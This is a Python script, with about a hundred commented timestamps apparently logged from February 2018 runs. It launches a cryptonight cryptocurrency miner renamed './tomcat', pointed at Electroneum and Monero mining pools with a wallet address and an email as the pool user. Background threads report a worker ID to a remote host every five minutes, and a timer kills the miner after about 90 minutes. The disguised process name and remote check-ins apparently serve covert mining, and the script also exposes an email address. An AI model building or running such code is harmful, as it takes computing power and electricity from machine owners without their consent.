import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:29:06.787355
#2018-02-17 16:16:06.349056
#2018-02-17 18:03:02.086559
#2018-02-17 19:51:01.792822
#2018-02-17 21:38:06.538139
#2018-02-17 23:22:03.933018
#2018-02-18 01:11:04.624528
#2018-02-18 02:58:01.762407
#2018-02-18 04:46:07.126662
#2018-02-18 06:37:01.912342
#2018-02-18 08:24:06.087690
#2018-02-18 10:12:06.269735
#2018-02-18 11:58:03.337751
#2018-02-18 13:43:05.162581
#2018-02-18 15:35:08.255571
#2018-02-18 17:24:05.406757
#2018-02-18 19:13:05.560655
#2018-02-18 20:59:03.888243
#2018-02-18 22:44:05.942084
#2018-02-19 00:33:05.866539
#2018-02-19 02:18:02.136970
#2018-02-19 04:05:07.337249
#2018-02-19 05:49:01.978482
#2018-02-19 07:37:06.943324
#2018-02-19 09:26:05.103157
#2018-02-19 11:15:08.907428
#2018-02-19 13:02:08.943972
#2018-02-19 14:49:10.741975
#2018-02-19 16:38:05.199238
#2018-02-19 18:24:06.610180
#2018-02-19 20:09:08.935273
#2018-02-19 21:58:08.074084
#2018-02-19 23:43:08.297962
#2018-02-20 01:31:04.207978
#2018-02-20 03:19:01.962551
#2018-02-20 05:06:01.610747
#2018-02-20 06:48:07.180037
#2018-02-20 08:35:04.650860
#2018-02-20 10:19:06.530922
#2018-02-20 12:04:04.834487
#2018-02-20 13:50:06.958404
#2018-02-20 15:34:08.122714
#2018-02-20 17:19:07.908370
#2018-02-20 19:08:07.286415
#2018-02-20 20:56:05.355892
#2018-02-20 22:41:04.603348
#2018-02-21 00:23:01.707014
#2018-02-21 02:08:04.609137
#2018-02-21 03:54:06.368242
#2018-02-21 05:41:04.525437
#2018-02-21 07:29:01.606013
#2018-02-21 09:13:05.569210
#2018-02-21 11:02:02.084295
#2018-02-21 12:48:01.366855
#2018-02-21 14:36:06.841052
#2018-02-21 16:22:06.181088
#2018-02-21 18:13:05.365998
#2018-02-21 19:58:05.760324
#2018-02-21 21:45:10.428245
#2018-02-21 23:33:07.899898
#2018-02-22 01:21:05.950690
#2018-02-22 03:10:04.950160
#2018-02-22 04:56:06.378692
#2018-02-22 06:41:01.951900
#2018-02-22 08:30:07.283466
#2018-02-22 10:17:01.488390
#2018-02-22 12:02:04.484976
#2018-02-22 13:49:09.584229
#2018-02-22 15:37:07.003888
#2018-02-22 17:22:07.640969
#2018-02-22 19:11:01.951442
#2018-02-22 21:03:01.547471
#2018-02-22 22:48:01.808810
#2018-02-23 00:34:01.786404
#2018-02-23 02:19:06.351712
#2018-02-23 04:11:01.917966
#2018-02-23 05:55:07.559550
#2018-02-23 07:37:01.404536
#2018-02-23 09:39:07.721151
#2018-02-23 11:45:12.430756
#2018-02-23 13:34:07.620464
#2018-02-23 15:22:05.176958
#2018-02-23 17:08:09.699835
#2018-02-23 18:54:02.164551
#2018-02-23 20:39:07.891230
#2018-02-23 22:25:05.873751
#2018-02-24 00:10:03.756085
#2018-02-24 02:04:02.195465
#2018-02-24 03:54:05.417018
#2018-02-24 05:41:01.326838
#2018-02-24 07:31:05.405460
#2018-02-24 09:17:05.943439
#2018-02-24 11:11:06.062903
#2018-02-24 13:00:08.064118
#2018-02-24 14:47:03.370778
#2018-02-24 16:39:07.016229
#2018-02-24 18:28:02.090358
#2018-02-24 20:14:06.202764
#2018-02-24 22:04:01.229973
#2018-02-25 01:01:07.870140
#2018-02-25 04:34:05.027314
#2018-02-25 08:01:01.943557